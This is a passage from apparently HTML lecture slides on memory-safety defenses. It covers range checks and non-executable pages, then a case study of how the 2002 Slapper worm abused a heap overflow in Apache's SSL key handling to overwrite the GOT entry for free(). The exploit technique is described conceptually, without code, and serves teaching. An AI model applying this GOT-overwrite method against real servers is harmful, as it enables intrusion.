- Also computes the range of valid code addresses and performs a range check on all function calls and returns
	- A call to, or return into, a data area will be detected as invalid because of the address range


## Operating System Defenses
- Don't allow execution in the stack
  - Exploit could still execute code from the heap or other global data area
- Instead of read and write permission bits on pages, add an execute permission bit and set it to false on all data pages (heap, stack, etc.)
	- This is supported in hardware on the Intel x86-64 architecture and in the versions of Microsoft Windows (from XP onwward) that run on it


## Case Study: Slapper Worm
- The 2002 worm known as [Linux/Slapper](https://www.symantec.com/security_response/writeup.jsp?docid=2002-091311-5851-99) was a very complex attack on heap buffer overflow vulnerabilities within the Apache web server
- Vulnerability: In secure mode (i.e. on an https:// connection under SSL [Secure Socket Layer]), Apache copied the client's master key into a fixed-length buffer `key_arg[]` that was just big enough to hold a valid 8-byte key
  - But didn't do any bounds checking, even though the key length is passed as a second parameter with the key


## Case Study: Slapper Worm
- Exploit: Pass in a long key and key length, such that a certain magic address is overwritten


## Slapper: The Magic Address
- The magic address that Slapper wanted to overwrite was the GOT (Global Offset Table) entry for the `free()` function
	- GOT is the Unix/ELF equivalent of the IAT (Import Address Table) in a Windows PE file; Slapper is therefore an IAT modifying EPO worm
	- I.e. If you redirect the GOT entry for free(), then calls into the C run-time library that should have gone into free() are now redirected to a new address


## Slapper: The Magic Address
- The relative distance from the key_arg[] buffer to the GOT entry for `free()` differs among Apache revisions and among different Linux revisions for which Apache was compiled
- The Slapper author computed the addresses and distances across 23 (!) different combinations of Apache revision/Linux system


## Slapper: The Magic Address
- The first client message the worm sends is a request for Apache to identify its revision number and the Linux system version code (a legitimate request, as Apache services can depend on these numbers)
  - The exploit code was then tuned for the particular revision/system
-  Ultimately, Slapper ran its own shellcode on the server system, with Apache privileges, when Apache executed a call to `free()`
- See Szor, 10.4.4, for lots more details
	</textarea></section>

      </section>
      
    </div>
  </div>
  <script src="reveal.js/lib/js/head.min.js"></script> 
  <script src="reveal.js/js/reveal.js"></script>
  <script src="settings.js"></script> 
</body>
</html>